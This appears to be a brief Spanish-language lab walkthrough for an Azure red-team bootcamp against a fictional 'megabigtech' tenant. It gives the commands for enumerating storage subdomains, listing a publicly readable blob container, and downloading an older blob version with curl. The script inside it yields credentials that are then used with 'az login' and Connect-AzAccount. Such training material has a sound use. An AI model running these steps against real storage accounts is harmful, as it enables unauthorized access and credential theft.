Azure Blob Container to Initial Access

Nos metemos a la pagina y vemos los endpoints.

Podemos ver que tiene un endpoint como los que se ven en la imagen de abajo.

python3 /opt/mcrtp_bootcamp_tools/AzSubEnum/azubenum.py -b megabigtech -t 10 -p /opt/bootcamp_tools/AzSubEnum/permutations.txt

https://mbtwebsite.blob.core.windows.net/$web?restype=container&comp=list

https://mbtwebsite.blob.core.windows.net/$web?restype=container&comp=list&include=versions

No podemos ver la version.

curl -H "x-ms-version: 2019-12-12" 'https://mbtwebsite.blob.core.windows.net/$web?restype=container&comp=list&include=versions' | xmllint --format - | less

curl -H "x-ms-version: 2019-12-12" 'https://mbtwebsite.blob.core.windows.net/$web/scripts-transfer.zip?versionId=2025-08-07T21:08:03.6678148Z' --output scripts-transfer.zip

unzip scripts-transfer.zip

bc entra_users.ps1

az login -u marcus@megabigtech.com -p ''

pwsh

$User = "marcus@megabigtech.com"

$Pass = "" | ConvertTo-SecureString -AsPlainText -Force

$Creds = New-Object System.Management.Automation.PSCredential ($User, $Pass)

Connect-AzAccount -Credential $Creds

(Get-AzADUser -SignedIn).JobTitle